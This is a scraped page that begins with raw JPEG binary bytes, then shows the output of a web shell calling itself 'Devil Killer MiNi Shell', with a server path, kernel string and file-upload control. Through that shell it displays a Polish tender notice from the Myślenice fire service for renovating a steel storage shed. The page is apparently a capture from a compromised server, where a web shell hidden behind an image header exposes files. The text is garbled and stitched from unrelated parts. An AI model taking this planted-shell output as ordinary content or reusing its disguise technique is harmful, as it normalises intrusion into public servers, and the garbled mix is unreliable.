JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20251103/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20251103/0051163701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont wiaty magazynowej o konstrukcji stalowej o wymiarach 17,5 x 6,5 m Komendy Powiatowej Państwowej Straży Pożarnej w Myślenicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Powiatowa Państwowej Straży Pożarnej w Myślenicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350132584</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Przemysłowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Myślenice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 605 251 311</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sgoralik_my@malopolskie.straz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/kppsp-myslenice</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa Straż Pożarna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont wiaty magazynowej o konstrukcji stalowej o wymiarach 17,5 x 6,5 m Komendy Powiatowej Państwowej Straży Pożarnej w Myślenicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-52281bbe-fb2c-42c5-91e6-79a8b442f257</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00511637</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-11-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00470261/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont magazynu o konstrukcji stalowej o wymiarach 17,5x6,5 m</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://malopolskapsp.ezamawiajacy.pl/pn/KWPSP/demand/244761/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://malopolskapsp.ezamawiajacy.pl/pn/KWPSP/demand/244761/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacja o sposobie porozumiewania się z wykonawcami<br/>1. W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za<br/>pomocą środków komunikacji elektronicznej.<br/>2. Pytania do SWZ należy zadawać za pośrednictwem platformy zakupowej zamawiającego przez<br/>link: https://malopolskapsp.ezamawiajacy.pl w sekcji „Korespondencja”. Instrukcja korzystania<br/>z systemu jest dostępna pod wyżej wskazanym adresem.<br/>3. Oferta wraz z załącznikami musi być złożona w postaci elektronicznej w systemie<br/>informatycznym dostępnym pod adresem https://malopolskapsp.ezamawiajacy.pl.<br/>4. Za datę złożenia oferty, przekazania wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji<br/>przyjmuje się datę ich przekazania na platformę zakupową zamawiającego, opisane zostały w<br/>Instrukcji dla wykonawców która jest udostępniana na platformie zakupowej zamawiającego.<br/>5. Wymagania dotyczące zasad rejestracji oraz minimalnych parametrów technicznych<br/>wymaganych od wykonawcy przy wykorzystywaniu systemu do elektronicznej komunikacji z<br/>wykonawcami<br/>Oferta wraz z załącznikami musi zostać złożona w postaci elektronicznej. Złożenie oferty<br/>wymaga do Wykonawcy zarejestrowania się i zalogowania w systemie informatycznym<br/>dostępnym pod adresem https://malopolskapsp.ezamawiajacy.pl, zgodnie z poniższą<br/>kolejnością. Rejestracja konta następuje automatycznie poprzez: podpisanie się pod wnioskiem<br/>podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym) lub kontakt z<br/>numerem telefonu podanym w potwierdzeniu lub jeżeli użytkownik nie podpisze się na wniosku<br/>ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu maksymalnie 6<br/>godzin roboczych. Mając to na uwadze, zamawiający zaleca wykonawcom uwzględnienie<br/>czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci elektronicznej.<br/>Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub<br/>do założenia bezpłatnego konta. Wykonawca biorący udział w postępowaniu prowadzonym<br/>drogą elektroniczną w systemie zakłada konto, wykonując kroki procesu rejestracyjnego podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka,<br/>akceptuje regulamin, klika polecenie „zarejestruj się”. Po założeniu konta wykonawca ma<br/>możliwość złożenia oferty w postępowaniu.<br/>6. Zamawiający wskazuje informacje, o których mowa w Rozporządzenia Prezesa Rady Ministrów<br/>w sprawie użycia środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych, dotyczące<br/>systemu dostępnego pod adresem https://malopolskapsp.ezamawiajacy.pl:<br/>• Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s;<br/>• Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu<br/>operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>• Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez<br/>producenta obsługująca TLS 1.2;<br/>• Włączona obsługa JavaScript;<br/>• Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">INFORMACJA DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH<br/>1. Na podstawie art. 19 ust. 1 PZP w związku z art. art. 13 ust. 1-3 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu<br/>takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych),<br/>dalej „RODO”, Zamawiający informuje, że:<br/>1.1. administratorem Państwa danych osobowych jest Komenda Powiatowa Państwowej Straży<br/>Pożarnej w Myślenicach<br/>1.2. administrator wyznaczył Inspektora Danych Osobowych, adres e-mail:<br/>daneosobowe@malopolskie.straz.gov.pl<br/>1.3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, które jest<br/>prowadzone w trybie przetargu nieograniczonego;<br/>1.4. odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 74 PZP;<br/>1.5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy (art. 78 ust. 4<br/>PZP);<br/>1.6. obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa<br/>jest wymogiem określonym w przepisach PZP, związanym z udziałem w niniejszym<br/>postępowaniu;<br/>1.7. w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do postanowień art. 22 RODO;<br/>1.8. posiadają Państwo:<br/>1.8.1. zgodnie z art. 15 RODO - prawo dostępu do danych osobowych Państwa<br/>dotyczących (z zastrzeżeniem, że w sytuacji, gdy skorzystanie z tego prawa<br/>wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą<br/>Państwo zostać zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania<br/>o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia);<br/>1.8.2. zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych (z<br/>tym, że skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu z<br/>postępowania oraz załączników do niego);<br/>1.8.3. zgodnie z art. 18 RODO - prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa<br/>w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z<br/>uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uznają Państwo, że przetwarzanie Państwa danych osobowych narusza przepisy<br/>RODO;<br/>1.9 nie przysługuje Państwu:<br/>1.9.1. zgodnie z art. 17 ust. 3 lit. b, d lub e RODO - prawo do usunięcia danych osobowych;<br/>1.9.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>1.9.3. zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych,<br/>gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1<br/>lit. c RODO;<br/>przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie<br/>Państwa danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd<br/>Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PT.2370.12.2025.GS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 130081,3 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont wiaty magazynowej o konstrukcji stalowej o wymiarach 17,5 x 6,5 m Komendy Powiatowej Państwowej Straży Pożarnej w Myślenicach<br/>Remont wiaty magazynowej o konstrukcji stalowej Komendy Powiatowej Państwowej Straży Pożarnej w Myślenicach zgodnie ze załączoną SWZ, przedmiarami robót oraz STWiORB. <br/>Przedmiotem zamówienia jest realizacja robót budowlanych pn. „Remont wiaty magazynowej o konstrukcji stalowej o wymiarach 17,5 x 6,5 m”. Główny zakres robót obejmuje: 1. Remont istniejącej nawierzchni polegający na wykonaniu warstwy betonu wraz z uzbrojeniem – ok. 115 m2; 2. Czyszczenie, impregnacja i malowanie istniejącej konstrukcji stalowej (słupy i dźwigary) celem przywrócenia ich sprawności technicznej; 3. Wymiana obudowy ścian i dachu –blacha trapezowa aluminiowa T-35, grubość: 0,6 mm; kolor RAL 8017; 4. Wymiana bramy segmentowej wraz z automatyką o wymiarach szer. 5 m x wys. 3,0 m – 1 szt. 5. Montaż nowych okien z PCV; kolor biały o wymiarach 0,5 x 3 m – 2 szt. 6. Montaż nowych drzwi technicznych stalowych – 0,9 x 2m - 1 szt. 7. Wymiana orynnowania magazynu – rynny PCV oraz rynny spustowe PCV 8. Remont instalacji<br/>elektrycznej (oświetlenie magazynu) – montaż 8 lamp LED; IP65 9. Skucie istniejącego podestu betonowego (cokół o wymiarach: wys. 15 cm x szer. 1,4 m x 4,1 m) na którym obecnie posadowiony jest stacjonarny agregat prądotwórczy; 10. Wykonanie podestu betonowego zbrojonego o wymiarach 1.4 x 4,1 m wysokość 15 cm celem posadowienia przeniesionego agregatu stacjonarnego; 11. Przeniesienie zasilania awaryjnego obiektów (stacjonarny agregat prądotwórczy) znajdującego się w części istniejącego magazynu, a następnie jego posadowienie na podeście betonowym (patrz pkt. 10) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31122000-7 - Jednostki prądotwórcze</p> <p class="mb-0">45223500-1 - Konstrukcje z betonu zbrojonego</p> <p class="mb-0">45216121-8 - Roboty budowlane w zakresie obiektów straży pożarnej</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45213220-1 - Roboty budowlane w zakresie magazynów</p> <p class="mb-0">45223110-0 - Instalowanie konstrukcji metalowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (t. j. Dz. U. z 2021 r. poz. 275), z innym Wykonawca, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>2. Aktualnego odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.1 pkt 4 ustawy, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji (dotyczy również podwykonawcy).<br/>Inne dokumenty (składane wraz z ofertą):<br/>1. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania opatrzone<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym -<br/>wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z<br/>Wykonawców (dotyczy również każdego wspólnika spółki cywilnej).<br/>2. Oświadczenie Podwykonawcy o niepodleganiu wykluczeniu z postępowania opatrzone<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym -<br/>wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik do SWZ (jeżeli<br/>Wykonawca przewiduje udział podwykonawców w realizacji zamówienia).<br/>3. Oświadczenia Wykonawcy, Podwykonawcy (jeżeli występuje) o niepodleganiu wykluczeniu z<br/>postępowania na postawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego.<br/>Każdy z podmiotów występujących wspólnie zobowiązany jest do złożenia, oświadczeń i<br/>dokumentów określonych w ww. rozdziale SWZ. Dokumenty te potwierdzają brak podstaw<br/>wykluczenia.<br/>Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia (wspólnicy spółki cywilnej,<br/>konsorcja itp.) ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie należytego<br/>wykonania umowy.<br/>Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wszyscy Wykonawcy występujący wspólnie muszą upoważnić ustanowionego pełnomocnika na<br/>piśmie (zgodnie z art. 99 Kodeksu Cywilnego), jako przedstawiciela pozostałych Wykonawców, a<br/>pełnomocnictwo podpisane przez wszystkie strony należy dołączyć do składanej oferty.<br/>Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców<br/>występujących wspólnie, tzn. musi być podpisana przez wszystkich Wykonawców bądź z treści<br/>upoważnienia musi wynikać, iż wyznaczony lider ma prawo do podpisywania oferty oraz innych<br/>dokumentów (w tym umowy) w imieniu wszystkich Wykonawców.<br/>Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą<br/>występującym jako pełnomocnik pozostałych (lider).<br/>Wykonawca, który przewiduje udział podwykonawców w celu w wskazania braku istnienia<br/>wobec nich podstaw do wykluczenia z udziału w postepowaniu składa oświadczenie o braku<br/>podstaw wykluczenia z postępowania każdego z podwykonawców oddzielnie. Oświadczenie<br/>musi zostać podpisane kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym przez właściwego podwykonawcę.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Każdy z podmiotów występujących wspólnie zobowiązany jest do złożenia, oświadczeń i<br/>dokumentów określonych w ww. rozdziale SWZ. Dokumenty te potwierdzają brak podstaw<br/>wykluczenia.<br/>Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia (wspólnicy 